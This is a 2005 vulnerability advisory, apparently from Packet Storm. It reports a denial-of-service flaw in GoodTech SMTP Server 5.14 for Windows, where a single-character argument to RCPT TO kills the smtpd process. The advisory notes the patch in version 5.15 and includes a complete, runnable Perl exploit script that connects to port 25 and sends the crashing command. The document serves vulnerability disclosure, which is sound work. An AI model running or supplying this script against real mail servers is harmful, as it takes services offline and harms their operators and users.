Lucene search
K

goodtechDoS.txt

🗓️ 20 Jun 2005 00:00:00Reported by Reed ArvinType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Denial of Service vulnerability in GoodTech SMTP Server for Windows NT/2000/XP version 5.14. Improperly checked and/or filtered input to the RCPT TO command causes smtpd process to die

Code
`Summary:  
Denial of Service vulnerability in GoodTech SMTP Server for Windows  
NT/2000/XP version 5.14  
(http://www.goodtechsys.com/)  
  
Details:  
Input to the RCPT TO command is not properly checked and/or filtered.  
Issuing a single character 'A' as an argument to the RCTP TO command  
will cause the smtpd process to die.  
  
Vulnerable Versions:  
GoodTech SMTP Server for Windows NT/2000/XP version 5.14  
  
Patches/Workarounds:  
The vendor has released version 5.15 to patch the affected software.  
It is available at http://www.goodtechsys.com/.  
  
Exploit:  
Run the following PERL script against the server. The process will die.  
  
#===== Start GoodTechSMTPServer_DOS.pl =====  
#  
# Usage: GoodTechSMTPServer_DOS.pl <ip>  
# GoodTechSMTPServer_DOS.pl 127.0.0.1  
#  
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14  
#  
# Download:  
# http://www.goodtechsys.com/  
#  
###########################################################  
  
use IO::Socket;  
use strict;  
  
my($socket) = "";  
  
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
PeerPort => "25",  
Proto => "TCP"))  
{  
print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";  
  
sleep(1);  
  
print $socket "HELO moto.com\r\n";  
  
sleep(1);  
  
print $socket "RCPT TO: A\r\n";  
  
close($socket);  
}  
else  
{  
print "Cannot connect to $ARGV[0]:25\n";  
}  
#===== End GoodTechSMTPServer_DOS.pl =====  
  
Discovered by Reed Arvin reedarvin[at]gmail[dot]com  
(http://reedarvin.thearvins.com/)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation